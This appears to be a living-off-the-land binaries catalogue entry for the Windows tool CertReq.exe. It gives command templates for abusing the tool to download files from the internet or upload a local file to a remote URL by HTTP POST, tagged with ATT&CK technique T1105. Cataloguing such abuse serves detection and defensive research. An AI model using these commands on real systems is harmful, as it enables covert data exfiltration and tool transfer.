.. /CertReq.exe
Star

Download
Upload

Used for requesting and managing certificates

Paths:

Resources:

Acknowledgements:

Detections:

Download

  1. Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).

    CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}
    Use case
    Download file from Internet
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105

Upload

  1. Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.

    CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}
    Use case
    Upload
    Privileges required
    User
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105